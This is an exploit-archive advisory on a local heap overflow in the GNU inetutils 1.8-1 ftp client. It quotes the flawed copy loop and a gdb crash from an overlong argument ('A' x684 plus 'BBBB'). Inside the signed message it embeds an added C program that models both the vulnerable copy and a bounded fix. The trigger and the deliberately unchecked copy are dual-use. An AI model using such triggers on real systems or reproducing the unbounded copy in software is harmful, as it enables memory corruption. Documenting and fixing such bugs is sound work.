GNU inetutils 1.8-1 FTP Client Heap Overflow
Posted Dec 7, 2010
Authored by Rew

GNU inetutils version 1.8-1 suffers from an ftp client heap overflow vulnerability.

tags | exploit, overflow
SHA-256 | 282da6696173d8cd3739def58f4cfdc260a9fe4ac9634077887519e75c3b4e34

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title: GNU inetutils 1.8-1 ftp client Heap Overflow
Date: Dec 07 2010
Author: Rew
Software Link: http://ftp.gnu.org/gnu/inetutils/inetutils-1.8.tar.gz
Version: 1.8-1
Tested on: Arch Linux (up to date)
CVE: NA (0day)

===========================================================================

Here's a cute little bug just for kicks. This is only triggerable by
the local user, so exploitation would get you absolutely nowhere, but
meh :P

GNU inetutils ftp (shipped with Linux and other *nix systems) suffers a heap
overflow while parsing command arguments, but ONLY when the argument is
NOT passed on the same line. If you run any command (open, user, cd,
mkdir, etc.) without an argument, ftp will prompt you for one with
readline(). It then copies this input into a 200-byte buffer without
first checking its length. NOTE: Some distros might modify this binary.
It didn't seem to work on the default Mint ftp client (maybe an Ubuntu
thing?) but the default Arch binary is vulnerable. Your results may vary.
Download from GNU if you have doubts.

--- ftp/main.c:slurpstring() ---

406: char *sb = stringbase; <--- This is our input. (can be massive)
407: char *ap = argbase; <--- This buffer is 200 bytes.

458: S1:

463: case '\0':
464: goto OUT;

474: default:
475: *ap++ = *sb++; <--- Heap overflow
476: got_one = 1;
477: goto S1;
478: }

--------------------------------

backtrace at overflow:
main()->cmdscanner()->cd()->another()->makeargv()->slurpstring()

The segfault below occurs later, when free() is called on a pointer that
sits 684 bytes past the start of the buffer and was overwritten by the input.
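To make the copy loop above concrete, here is an added, self-contained model of
the slurpstring() token copy: the unchecked "*ap++ = *sb++" form beside a
bounded form that refuses arguments that would not fit in the 200-byte
buffer. This is example code written for this page, not inetutils source; the
names slurp_token, vuln_makeargv, safe_makeargv and build_trigger are this
example's own, and the trigger string (684 'A's then "BBBB") is constructed to
match the gdb session below. The vulnerable variant is given oversized backing
storage so the over-write can be measured instead of corrupting heap metadata.

```c
/*
 * Added example (not inetutils code): a model of the ftp client's
 * slurpstring() token copy, in a vulnerable form (no bound on the
 * 200-byte argument buffer) and a hardened form that rejects oversized
 * arguments. All identifiers here are this example's own assumptions.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ARGBUF_SIZE 200   /* the fixed argument buffer size the advisory cites */

/*
 * Copy one whitespace-delimited token from *sbp into ap, honouring
 * "..." quoting and backslash escapes as a slurpstring()-style tokenizer does.
 * limit is the capacity of ap including the terminating NUL; limit == 0
 * disables the check and reproduces the unchecked "*ap++ = *sb++" loop.
 * Returns the token length, or -1 if the token would not fit.
 */
static long slurp_token(const char **sbp, char *ap, size_t limit)
{
    const char *sb = *sbp;
    char *start = ap;
    int quoting = 0;

    while (*sb == ' ' || *sb == '\t')      /* skip leading blanks */
        sb++;
    for (;;) {
        char c = *sb;
        if (c == '\0')
            break;
        if (!quoting && (c == ' ' || c == '\t' || c == '\n')) {
            sb++;
            break;
        }
        if (c == '"') {                    /* toggle quoting, drop the quote */
            quoting = !quoting;
            sb++;
            continue;
        }
        if (c == '\\' && sb[1] != '\0')    /* backslash: take next byte literally */
            c = *++sb;
        if (limit && (size_t)(ap - start) + 1 >= limit)
            return -1;                     /* no room for this byte plus NUL */
        *ap++ = c;
        sb++;
    }
    *ap = '\0';
    *sbp = sb;
    return ap - start;
}

/*
 * Vulnerable variant. The buffer is nominally ARGBUF_SIZE bytes, but the
 * caller hands over larger backing storage so the over-write lands in memory
 * we own. Returns bytes stored before the NUL, or (size_t)-1 if even the
 * harness storage is too small (a guard for this demo only).
 */
static size_t vuln_makeargv(const char *line, char *storage, size_t storage_len)
{
    const char *sb = line;
    if (strlen(line) + 1 > storage_len)
        return (size_t)-1;
    memset(storage, 0, storage_len);
    return (size_t)slurp_token(&sb, storage, 0);
}

/* True when the stored token plus its NUL ran past the 200-byte buffer. */
static int overflowed(size_t stored)
{
    return stored != (size_t)-1 && stored + 1 > ARGBUF_SIZE;
}

/* Hardened variant: the copy is bounded by the real buffer size. */
static int safe_makeargv(const char *line, char argbuf[ARGBUF_SIZE])
{
    const char *sb = line;
    return slurp_token(&sb, argbuf, ARGBUF_SIZE) < 0 ? -1 : 0;
}

/* Constructed trigger matching the advisory: 684 'A's then "BBBB". */
static size_t build_trigger(char *out, size_t outlen)
{
    const size_t pad = 684;
    const char tail[] = "BBBB";
    if (outlen < pad + sizeof tail)
        return 0;
    memset(out, 'A', pad);
    memcpy(out + pad, tail, sizeof tail);
    return pad + sizeof tail - 1;
}

int main(void)
{
    char trigger[1024], storage[4096], argbuf[ARGBUF_SIZE];
    size_t n = build_trigger(trigger, sizeof trigger);
    size_t stored = vuln_makeargv(trigger, storage, sizeof storage);

    printf("trigger %zu bytes, unchecked copy stored %zu bytes, overflow: %s\n",
           n, stored, overflowed(stored) ? "yes" : "no");
    printf("bytes at offset 684..687 of the buffer region: %.4s\n", storage + 684);
    printf("hardened copy of trigger: %s\n",
           safe_makeargv(trigger, argbuf) == 0 ? "accepted" : "rejected");
    printf("hardened copy of \"ftp.gnu.org 21\": %s, token '%s'\n",
           safe_makeargv("ftp.gnu.org 21", argbuf) == 0 ? "accepted" : "rejected",
           argbuf);
    return 0;
}
```

Compile with `cc -Wall -o slurp slurp.c && ./slurp`. The boundary worth
checking in the hardened form is that a 199-byte argument is accepted (199
bytes plus NUL fills the buffer exactly) and a 200-byte one is refused; in the
real client, once the copy is bounded, the caller also needs to report the
rejection instead of silently truncating, otherwise a "mkdir" or "cd" could
operate on a different name than the one typed.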

===========================================================================

rew@WOPR ~ $ pacman -Q inetutils
inetutils 1.8-1

rew@WOPR ~ $ gdb ftp
GNU gdb (GDB) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Reading symbols from /usr/bin/ftp...(no debugging symbols found)...done.

(gdb) run
Starting program: /usr/bin/ftp
ftp> open
(to) AAAAAAAA ... [x684] ... AAAAAAAABBBB
usage: open host-name [port]

Program received signal SIGSEGV, Segmentation fault.
0xb7eb8dc1 in free () from /lib/libc.so.6
(gdb) i r
eax 0x0 0
ecx 0x1 1
edx 0x42424239 1111638329
ebx 0xb7f8fff4 -1208418316
esp 0xbffff818 0xbffff818
ebp 0xbffff828 0xbffff828
esi 0x8064518 134628632
edi 0x8064be0 134630368
eip 0xb7eb8dc1 0xb7eb8dc1 <free+49>
eflags 0x210216 [ PF AF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkz+xCwACgkQy2WYMxSouUxJgACePkKDrYlTuj0UaU6s0NmjVWKZ
uBQAoJXka83R8QvgzmEj0yF0B9Eni40Y
=SUzV
-----END PGP SIGNATURE-----
